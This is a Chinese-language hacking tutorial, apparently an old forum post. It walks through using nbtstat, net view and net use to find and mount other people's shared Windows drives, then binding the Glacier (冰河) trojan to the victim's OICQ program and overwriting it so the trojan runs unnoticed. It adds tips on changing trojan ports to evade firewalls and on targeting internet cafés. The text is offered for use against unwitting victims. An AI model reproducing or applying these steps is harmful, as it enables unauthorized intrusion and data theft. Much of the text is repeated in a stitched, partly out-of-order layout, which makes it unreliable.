在命令提示符下(即,win9x的dos命令行下)
输入 nbtstat -A xxx.xxx.xxx.xxx
会得到如下提示信息:
NetBios remote machine name table
name __type _________status
clovea <00> unique registered
mmxxcc <00> group registered
clovea <03> unique registered
mac address = 00-00-00-00-00-00
这里就告诉了你对方的注册用户名,和主机名 均为clovea
mmxxcc为对方注册公司。
第三步,在命令提示符下输入,
net view
\\xxx.xxx.xxx.xxx这时会显示对方的共享资源。
比如
c xx c
说明对方的c盘是共享的。
第四步,接下来输入
net use z:
\\xxx.xxx.xxx.xxx\c这时,你的z:就成为对方c盘的应像了,可以直接用dos命令操作
如copy z:\program files\oicq.exe d:\oicq.exe
也可以到到windows界面,打开我的电脑,直接操作。
第5步,查明对方的常用软件,如oicq,winamp,等等
然后把对方的常用软件和木马进行捆绑,如把oicq.exe 和G_sever.exe(冰河2.2服务端)。
第6步,偷梁换柱,把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马,嘿嘿。
第7步,等着你的冰河给你发mail吧,呵呵,不过大家最好还是别用冰河,冰河的万能密码太恐怖了,还有,默认的木马端口一定要记得改啊。
备注,如果对方拥有天网之内的防火墙的话,你是查不到对方的共享资源和信息的。
如果你已经成功的侵入,而又能肯定对方要装防火墙的话,请把木马端口限制在1024以下。
以上方法虽然是利用对方的错误配置等进攻,并且懂点安全知识的都不会共享自己的资源的,但是经我实验证实,有很多网吧为了方便,硬盘都是共享了的,如果对方有路由的话,就先用ip欺骗吧!
首先需要得知对方的ip
可以用oicq来查对方ip,也可以在聊天室内查。
工具很多,随便都可以抓到一大把。
第二步,在命令提示符下(即,win9x的dos命令行下)
输入 nbtstat -A xxx.xxx.xxx.xxx
会得到如下提示信息:
NetBios remote machine name table
name __type _________status
clovea <00> unique registered
mmxxcc <00> group registered
clovea <03> unique registered
mac address = 00-00-00-00-00-00
这里就告诉了你对方的注册用户名,和主机名 均为clovea
mmxxcc为对方注册公司。
第三步,在命令提示符下输入,
net view
\\xxx.xxx.xxx.xxx这时会显示对方的共享资源。
比如
c xx c
说明对方的c盘是共享的。
第四步,接下来输入
net use z:
\\xxx.xxx.xxx.xxx\c这时,你的z:就成为对方c盘的应像了,可以直接用dos命令操作
如copy z:\program files\oicq.exe d:\oicq.exe
也可以到到windows界面,打开我的电脑,直接操作。
第5步,查明对方的常用软件,如oicq,winamp,等等
然后把对方的常用软件和木马进行捆绑,如把oicq.exe 和G_sever.exe(冰河2.2服务端)。
第6步,偷梁换柱,把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马,嘿嘿。
第7步,等着你的冰河给你发mail吧,呵呵,不过大家最好还是别用冰河,冰河的万能密码太恐怖了,还有,默认的木马端口一定要记得改啊。备注,如果对方拥有天网之内的防火墙的话,你是查不到对方的共享资源和信息的。
如果你已经成功的侵入,而又能肯定对方要装防火墙的话,请把木马端口限制在1024以下。
以上方法虽然是利用对方的错误配置等进攻,并且懂点安全知识的都不会共享自己的资源的,但是经我实验证实,有很多网吧为了方便,硬盘都是共享了的,如果对方有路由的话,就先用ip欺骗吧!